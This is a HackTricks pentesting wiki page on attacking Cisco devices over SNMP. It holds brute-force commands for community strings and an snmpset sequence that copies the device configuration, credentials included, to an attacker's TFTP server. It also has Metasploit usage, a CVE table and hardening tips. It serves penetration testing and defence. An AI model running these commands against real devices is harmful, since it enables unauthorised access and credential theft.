maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md

106 lines
4.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cisco SNMP
{{#include ../../banners/hacktricks-training.md}}
## Pentesting Cisco Networks
**SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.
A classic—yet still extremely effective—attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community).
A practical tool for this task is [**onesixtyone**](https://github.com/trailofbits/onesixtyone):
```bash
onesixtyone -c community_strings.txt -i targets.txt
```
Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module:
```bash
nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp
```
---
### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)
If you obtain an **RW community** you can copy the running-config/startup-config to a TFTP/FTP server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). Two common approaches are:
1. **Nmap NSE `snmp-ios-config`**
```bash
nmap -sU -p161 --script snmp-ios-config \
--script-args creds.snmp=private 192.168.66.1
```
The script automatically orchestrates the copy operation and prints the configuration to stdout .
2. **Manual `snmpset` sequence**
```bash
# Copy running-config (4) to a TFTP server (1) random row id 1234
snmpset -v2c -c private 192.168.66.1 \
1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \ # protocol = tftp
1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \ # sourceFileType = runningConfig
1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \ # destFileType = networkFile
1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4 # rowStatus = createAndGo
```
Row identifiers are *one-shot*; reuse within five minutes triggers `inconsistentValue` errors.
Once the file is on your TFTP server you can inspect credentials (`enable secret`, `username <user> secret`, etc.) or even push a modified config back to the device.
---
### Metasploit goodies
* **`cisco_config_tftp`** downloads running-config/startup-config via TFTP after abusing the same MIB.
* **`snmp_enum`** collects device inventory information, VLANs, interface descriptions, ARP tables, etc.
```bash
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run
```
---
## Recent Cisco SNMP vulnerabilities (2023 2025)
Keeping track of vendor advisories is useful to scope *zero-day-to-n-day* opportunities inside an engagement:
| Year | CVE | Affected feature | Impact |
|------|-----|-----------------|--------|
| 2025 | CVE-2025-20174 | SNMP subsystem | Crafted packet leads to authenticated *DoS* (reload) on IOS/IOS-XE (v1/v2c/v3). |
| 2024 | CVE-2024-20373 | IPv4 ACL handling | Mis-configured **extended** ACLs silently *fail*, allowing unauthenticated SNMP polling when a valid community/user is known. |
| 2025 | (no CVE yet) | SNMPv3 configuration restriction bypass | Valid v3 user can poll from addresses that should be denied. |
Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant.
---
## Hardening & Detection tips
* Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVE above).
* Prefer **SNMPv3** with `authPriv` (SHA-256/AES-256) over v1/v2c.
```
snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
```
* Bind SNMP to a management VRF and **restrict with *standard* numbered IPv4 ACLs** (extended named ACLs are risky CVE-2024-20373).
* Disable **RW communities**; if operationally required, limit them with ACL and views:
`snmp-server community <string> RW 99 view SysView`
* Monitor for:
- UDP/161 spikes or unexpected sources (SIEM rules).
- `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` events indicating out-of-band config changes.
* Enable **SNMPv3 logging** and `snmp-server packetsize 1500` to reduce certain DoS vectors.
---
## References
- Cisco: *How To Copy Configurations To and From Cisco Devices Using SNMP*
- Cisco Security Advisory *cisco-sa-snmp-uwBXfqww* (CVE-2024-20373)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink